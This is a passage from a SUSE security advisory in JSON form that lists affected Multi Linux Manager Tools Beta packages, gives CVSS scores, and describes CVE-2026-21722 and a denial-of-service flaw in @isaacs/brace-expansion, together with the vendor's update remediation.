"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "moderate"
}
],
"title": "CVE-2026-21722"
},
{
"cve": "CVE-2026-25547",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-25547"
}
],
"notes": [
{
"category": "general",
"text": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-25547",
"url": "https://www.suse.com/security/cve/CVE-2026-25547"
},
{
"category": "external",
"summary": "SUSE Bug 1257834 for CVE-2026-25547",
"url": "https://bugzilla.suse.com/1257834"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
